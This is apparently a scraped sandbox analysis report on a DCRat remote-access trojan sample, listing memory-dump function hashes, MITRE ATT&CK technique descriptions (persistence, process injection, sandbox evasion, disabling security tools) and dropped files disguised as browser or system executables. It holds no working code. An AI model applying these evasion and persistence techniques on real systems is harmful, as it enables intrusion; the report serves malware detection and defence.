Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4605ea5b5893d25fc5780538dab67b9c051604082afc4679aba434b5a4c790
Instruction ID: 8979ae5a74c2b52f0bf101add423aaeef35f1697d7a787b7ed1a05e080d995aa
Opcode Fuzzy Hash: da4605ea5b5893d25fc5780538dab67b9c051604082afc4679aba434b5a4c790
Instruction Fuzzy Hash: 1D21F221B1C91A4FF799A72CC45AA7977E2EB99322F1080B9E40EC32E2DD18EC414281

Function 00007FFAAC7C4DAF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bdc3d3a0d121378f164dc933a011799976408db1ab88e864e2c61bca548fad1
Instruction ID: 9de429fc84e8d20fc16fbeacc10c42475676f0a832259d4919eb18e925750ac1
Opcode Fuzzy Hash: 6bdc3d3a0d121378f164dc933a011799976408db1ab88e864e2c61bca548fad1
Instruction Fuzzy Hash: DE21FF31A0D51BCBFB95FB14D859BB822B2AF96310F0181B5D50ED7292DE38ED898780

Function 00007FFAAC7C4D2C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72b319711430cb6d8573a60739725a55b1e498b33afb28c97ac13a2277eafac
Instruction ID: fe8e128772f5c3ab938bfc7b274eab989eb05c1b1393dd0513ae1b2487845101
Opcode Fuzzy Hash: f72b319711430cb6d8573a60739725a55b1e498b33afb28c97ac13a2277eafac
Instruction Fuzzy Hash: EB114F21E0D91B8BFAA6A718D8556BC22B1EF55300F5181B6D40ED7292DE28A94447C0

Function 00007FFAAC7C0C40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b53c6d0eec67158b18f4564d1a8467f4b48d7d7870d5dd5382dd0774fb53590
Instruction ID: 40a242f46cb680bd14ff8abe47d0bda64acd3bf6983ec8979c924e04a5d622f3
Opcode Fuzzy Hash: 7b53c6d0eec67158b18f4564d1a8467f4b48d7d7870d5dd5382dd0774fb53590
Instruction Fuzzy Hash: 1D01A135A0E789CFE712DB28C8541E87FB0EF43310F0485E6C484DB192D9389649C7C1

Function 00007FFAAC7C0C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d31a1bdd6344bfeecc4722549b5494a7af045021a14e0cf143fd3755101848
Instruction ID: 2a69e367f8be47ea607578d866c4c3029475813d783bbcda1f678f1501f5e8b1
Opcode Fuzzy Hash: 31d31a1bdd6344bfeecc4722549b5494a7af045021a14e0cf143fd3755101848
Instruction Fuzzy Hash: 4901527590E789CFE712DB64C8441D97FB0EF43314F1585E6C445DB192E5389648C7C1

Function 00007FFAAC7C2AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad84126a19adf7dfc84b8e9f54f424dca948c261ce4aeba83fa3c5c5ed54c33
Instruction ID: a837ffd4db9cabb41d1d5bd71272649ba676eb9c778cb07ff77a180911745b2a
Opcode Fuzzy Hash: aad84126a19adf7dfc84b8e9f54f424dca948c261ce4aeba83fa3c5c5ed54c33
Instruction Fuzzy Hash: 6DF03C30648A08CFDF48EF04C894DAD77F1FBA9301F144119D40AD3260CA30E985CF80

Function 00007FFAAC7C0C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551f801c1aa75b518efdab5852eaeac22334b4b966663fb25cf55abf38b127ed
Instruction ID: ad85ac5027a0940b36e2f17d275b33cd910f800dc43e1b61a1bd2675485a5e1f
Opcode Fuzzy Hash: 551f801c1aa75b518efdab5852eaeac22334b4b966663fb25cf55abf38b127ed
Instruction Fuzzy Hash: C7014F7590E789DFE722DB6488942EDBFB0EF07314F1485E6C485DB292E9389A48C781

Function 00007FFAAC7C06AD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7130cc12d443a584ee6278e7ba4512a3f23db9a82c8fbbbed89158f2ab0e3d
Instruction ID: ab9889fea0d874b611c3d0954c9acd43ffcec96c17e6b8b4a00ee89171a5b893
Opcode Fuzzy Hash: 2f7130cc12d443a584ee6278e7ba4512a3f23db9a82c8fbbbed89158f2ab0e3d
Instruction Fuzzy Hash: A2E04F07D5FA1B82F457377EA8460FC76205FC6224F958172D40C901C2AC0EA49E02E6

Function 00007FFAAC7C1F58 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction ID: 5a63755d6e49ce0eabf7ab4f68ce8b305c7f248b37a016080cf95fa7c27acb6b
Opcode Fuzzy Hash: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction Fuzzy Hash: 91E09A21E1E42B8BF7A5A714C8517B962B5AF95310F1480F4D54EE33D2DD28EE898BC1

Function 00007FFAAC7C0845 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67807d4f902293f16e45f7bbd0dc2a17fe0ecc9383be43c44719bf73def05834
Instruction ID: ac1f1d4d71a01a0b6d54bc3ee808a6e9f8958dee3fd8ba66bf897bd1d9bdf86b
Opcode Fuzzy Hash: 67807d4f902293f16e45f7bbd0dc2a17fe0ecc9383be43c44719bf73def05834
Instruction Fuzzy Hash: 48E02B21549C019BD258B77CDCA58D877A0FF05315F864170E04DC3172F648DC96C381

Function 00007FFAAC7C0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction ID: 1734868f60b20770c8cd37062d5c27aa51ac153679b307eb5f77e8b25b68b37f
Opcode Fuzzy Hash: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction Fuzzy Hash: 10C04C705158098FD944E72DC98595476F0FB1E315BD60190E40DCB171E65ADCD5C781

Function 00007FFAAC7C25D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a4204f1ecaa8a642eacec48bbd3f7d7771ec50a14ef5d9a46ece8489a37523
Instruction ID: 4b4a29a2a78fc57f2daebcdaf3a9baa62e4aa38e6bc147c7a208f7b3fd6bd04e
Opcode Fuzzy Hash: 26a4204f1ecaa8a642eacec48bbd3f7d7771ec50a14ef5d9a46ece8489a37523
Instruction Fuzzy Hash: 17D01210E0E94BC7FF4D6334801A1BA16A19F46310F108475EC0E973C3DC2CAC694AC0

Function 00007FFAAC7C06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: cd82071785bbf00482fb0cff863c016761c5f5fbcdf666899feaaaf6c8efe529
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: 16B01210C6FC4F40F40A337B084217474705B46108FC44270E40C40181984D519C02C2

Function 00007FFAAC7C2D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.1633991541.00007FFAAC7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffaac7c0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: f983bdcbeaefa75d7cf9d979cd2e4cbc3e99e4ecb05c4561d08946ab11598cca
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VIyu4dC9CU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\MSECache\7d63bcb2074184

C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe

C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe:Zone.Identifier

C:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files (x86)\Reference Assemblies\0a1fd5f707cd16

C:\Program Files (x86)\Reference Assemblies\sppsvc.exe

C:\Program Files (x86)\Reference Assemblies\sppsvc.exe:Zone.Identifier

C:\Program Files\Google\Chrome\7d63bcb2074184

C:\Program Files\Google\Chrome\TDdwNhXdQzDImnznNSm.exe

Windows Analysis Report
VIyu4dC9CU.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre